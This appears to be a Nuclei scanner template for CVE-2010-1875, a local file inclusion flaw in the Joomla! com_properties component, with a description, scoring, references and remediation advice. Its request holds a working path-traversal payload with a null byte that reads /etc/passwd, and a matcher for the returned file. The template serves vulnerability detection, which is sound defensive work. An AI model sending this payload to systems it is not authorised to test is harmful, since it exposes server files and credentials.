id: CVE-2010-1875 info: name: Joomla! Component Property - Local File Inclusion author: daffainfo severity: high description: A directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php. impact: | This vulnerability can result in the exposure of sensitive data, such as configuration files, database credentials, or other sensitive information stored on the server. remediation: | To remediate this vulnerability, it is recommended to update the affected Joomla! component to the latest version or apply the necessary patches provided by the vendor. reference: - https://www.exploit-db.com/exploits/11851 - https://nvd.nist.gov/vuln/detail/CVE-2010-1875 - http://www.exploit-db.com/exploits/11851 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57110 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1875 cwe-id: CWE-22 epss-score: 0.01222 epss-percentile: 0.85327 cpe: cpe:2.3:a:com-property:com_properties:3.1.22-03:*:*:*:*:*:*:* metadata: max-request: 1 vendor: com-property product: com_properties tags: cve2010,cve,joomla,lfi,edb,com-property http: - method: GET path: - "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00" matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" - type: status status: - 200 # digest: 4b0a00483046022100c7924052921ccd115c3e7f4b89b1d61ef082cb6e9cd7711eb66d7691a2d7cfe7022100ca66094ffe917a58618599af1d573c56619f1a976252054f12604523672789e4:922c64590222798bb761d5b6d8e72950